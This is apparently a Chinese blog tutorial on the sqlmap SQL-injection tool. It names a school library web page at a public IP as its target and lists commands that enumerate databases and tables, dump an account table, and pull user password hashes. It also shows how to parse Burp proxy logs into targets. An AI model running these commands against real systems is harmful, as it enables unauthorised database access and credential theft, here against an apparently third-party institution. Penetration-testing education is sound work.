安全测试--注入扫描 sqlmap

最新推荐文章于 2024-03-23 16:30:00 发布
最新推荐文章于 2024-03-23 16:30:00 发布
阅读量5.4k 收藏 7
点赞数 2
分类专栏: 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Qton_CSDN/article/details/79353368
版权

1.url:  学校图书馆 http://210.38.192.31:81/test.aspx

2 开始使用SQLMAP 

解压sqlmap到硬盘

比如D:/sqlmap,打开CMD,输入python D:sqlmapsqlmap.py 就可以用了。

  • 列几个基本命令

 

./sqlmap.py –h     //查看帮助信息

./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere”  //get注入

 

也可在kali 直接输入 sqlmap -u http://210.38.192.31:81/test.aspx

注:没有网站给我试,暂时就到这。

sqlmap.py -r 1.txt --threads=10 --tamper=space2comment --current-db -v 3

在觉得可能sql注入的地方提交表单,复制请求信息到根目录 1.txt 下,运行上面命令。

 

 

http://blog.csdn.net/wn314/article/details/78872828

 

3.从Burp或WebScarab的代理日志中解析目标

参数:-l

使用参数“-l”指定一个Burp或WebScarab的代理日志文件,Sqlmap将从日志文件中解析出可能的攻击目标,并逐个尝试进行注入。该参数后跟一个表示日志文件的路径。

WebScarab我没有用过,Burp倒是常常会用。Burp默认不记录日志,想要记录日志需要手动开启,设置方法如下图所示:

设置burp日志

只用勾选代理中的请求数据就足够了,日志文件路径可随意设置,这里我设置日志文件名为proxy.log,放在用户主目录中。

设置浏览器的代理为Burp,随便浏览几个网页后发现proxy.log竟然已经有70多K大,查看其内容,部分输出如下:

  werner@Yasser:~$ more proxy.log
  ======================================================
  7:22:52 PM  http://ocsp.digicert.com:80  [117.18.237.29]
  ======================================================
  POST / HTTP/1.1
  Host: ocsp.digicert.com
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Length: 83
  Content-Type: application/ocsp-request
  DNT: 1
  Connection: close

  0Q0O0M0K0I0   +
  �ǝ��Pr�Tz�
  ======================================================



  ======================================================
  7:23:00 PM  http://blog.csdn.net:80  [47.95.49.160]
  ======================================================
  GET /pyufftj/article/details/21469201 HTTP/1.1
  Host: blog.csdn.net
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  ...
  •  

可以看到该日志文件不仅记录了GET参数,还记录了cookie和POST参数。现在使用如下命令让Sqlmap解析该日志文件,自动寻找目标,检测注入漏洞:

  python sqlmap.py -l ../proxy.log

注意日志文件的路径要写正确。执行该命令时,每找到一个可能的攻击目标,Sqlmap都会询问是否要检测该目标。,默认回答为“Y”,想要测试该目标,直接按回车键就行。

当日志较大时会有很多可能目标,虽然有询问机制但依旧麻烦,因为不能一路按回车而要进行判断。若是可以对日志进行过滤就好了!确实是可以的,参数为“–scope”,详情见“五.18”。

 

 

 

18.用正则表达式过滤代理日志

参数:–scope

指定一个Python正则表达式对代理日志进行过滤,只测试符合正则表达式的目标,如:

  python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

 

 

 

 

 

小实战:

1.抓取请求,保存到get.txt

扫描是否有可以注入的点:

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment --current-db -v 3

 

2.查看数据库

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment --dbs -v 3

 

3 查看数据表

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment -D core --tables -v 3

 

4 查看某张表的columns信息

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment -D core -T t_account --columns -v 3

 

5 查看表里的数据

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment -D core -T t_account --dump -v 3

 

6.账户密码

 

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment --users -v 2

 

 

 

python2.7 c:\sqlmap\sqlmap.py -r c:\sqlmap\get.txt --threads=10 --tamper=space2comment --passwords -v 2

 

更多操作见:http://blog.csdn.net/wn314/article/details/78872828

 

 

Qton
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap自动扫描注入点_SQLmap指导手册
weixin_39532754的博客
11-22 2084
SQLmap指导手册一、前言sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。二、特点全力支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Acce...
sqlmap自动扫描注入点_SQL注入神器之SQLMAP
weixin_39569753的博客
11-26 2445
声明:本文章致力于帮助安全白帽研究web安全机制,请勿用作他用,请勿做违反法律行为!SQL注入一直是处于OWASPtop10,说明好多黑客都喜欢此种攻击方法,今天就来揭秘一种常用利器——SQLMAP,它是基于Python 语⾔编写的命令⾏⼯具,集成在Kali 中。SQLMAP的更新方法sudo apt-get update sudo apt-get install sqlmap参数速查-u 检测注...
SQL 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-23 3183
SQL 注入漏洞原理以及修复方法
aspx代码审计-1
dfdhxb995397的博客
09-20 226
今天和大家分享一下aspx网站的代码审计,漏洞类型就是SQL注入和cookie欺骗。 本文作者:i春秋签约作家——非主流 今天看的cms名字叫做:XX星员工请假系统 我们首先看一下网站的目录结构: 其中,很明显可以看到bin目录下面都是dll文件,也就是aspx网站的源码;install目录就是安装目录;admin目录就是后台目录…etc。 我们今天的目标是纯白盒审计,...
SQL注入检测工具及方法,黑客零基础入门
2201_75362610的博客
03-23 1456
SQL注入检测是通过各种手段来识别和验证应用程序是否容易受到SQL注入攻击的方法。
致翔OA msglog.aspx SQL注入漏洞
尘埃的博客
10-27 770
致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
qq_67473072的博客
07-25 2440
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
sqlmap漏洞扫描使用教程(入门+图文)
java
03-09 2595
sqlmap工具初级使用教程(入门+图文)
wed安全 sqlmap 扫描
04-02
它可以帮助渗透测试人员识别和利用 SQL 注入漏洞,获取目标数据库的信息,甚至控制整个数据库服务器。sqlmap 支持多种数据库系统,如 MySQL、PostgreSQL、Microsoft SQL Server、Oracle 和 SQLite 等。 以下是 ...
SQLmap-1.8.2版本
02-18
SQLmap是一个开源免费,且非常知名的自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行...
sqlmap1.6.5新版本
07-24
sqlmap1.6.5
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
万能注入神器sqlmap
04-26
万能注入神器sqlmap,进行SQL注入攻击测试的神器,软件安全SQL注入扫描神器,方便好用的万能注入神器,用过才知道
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2689
sqlmap的使用方法
渗透测试相关知识点如sqlmap注入nmap扫描方式sql注入类型sql注入防护方法等
HHH's Blogs
09-03 1845
一,sqlmap,怎么对一个注入注入? 1)如果是get型号,直接,sqlmap -u "诸如点网址". 2) 如果是post型诸如点,可以sqlmap -u "注入点网址” --data="post的参数" 3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r "文件地址" 二,nmap...
SQL-SqlMap注入
qq_70434663的博客
03-14 268
然后把里面的数据全部复制到真机(自己的电脑上)创建一个文本文件,然后上传至kali桌面上。到这里我们就得到了管理员的账号和密码,这里的密码是进行加密了,可以使用MD5进行解密。可以看到有5个数据库,我们使用dvwa库执行以下命令爆出库中的所有表。最后使用以下命令爆出user和password字段的内容,读取数据。首先打开靶机进入目标地址,直接在kali sqlmap上进行测试。然后我们使用以下命令爆出users表中的字段名。然后在kali上执行以下命令确定注入点。使用下面的命令爆出所有数据库。
Spring注入点的扫描(Autowired)
qq_33590654的博客
06-25 862
一、bean实例化后会调用postProcessMergedBeanDefinition后置处理器寻找注入点AutowiredAnnotationBeanPostProcessor#postProcessMergedBeanDefinition 二、findAutowiringMetadata先去缓存中看是否能获取到 三、寻找注入点buildAutowiringMetadata(Class clazz) 匹配属性、方法是否匹配............
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1579
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
sql注入扫描器——sqlmap
yiwenyida的博客
07-15 1108
sqlmap安装及使用
sqlmap -p wxlx
09-04
sqlmap -p wxlx 是一条命令,用于在目标网站的参数中搜索和利用潜在的SQL注入漏洞。下面是对该命令的详细解释: sqlmap 是一个流行的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持各种数据库管理系统,包括MySQL,Oracle,MS SQL Server等。 -p 参数用于指定需要测试的目标网站的URL或者请求文件。在这里,wxlx 是一个示例的参数名称,可能是目标网站的其中一个参数名。通过在命令中指定该参数,sqlmap将对该参数进行测试,以确定是否存在潜在的SQL注入漏洞。 执行该命令后,sqlmap将自动扫描目标网站中的参数,使用各种技术和方法进行测试,以尝试发现可利用的SQL注入漏洞。一旦发现漏洞,sqlmap可以进一步利用它来获取敏感数据,修改数据或执行其他恶意操作。 总之,sqlmap -p wxlx 是一条用于检测和利用Web应用程序中潜在SQL注入漏洞的命令。它是一种自动化工具,用于测试目标网站中指定参数的安全性,并可能导致进一步的攻击或数据泄露。在使用该工具时,务必遵守法律和道德准则,仅在合法授权范围内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值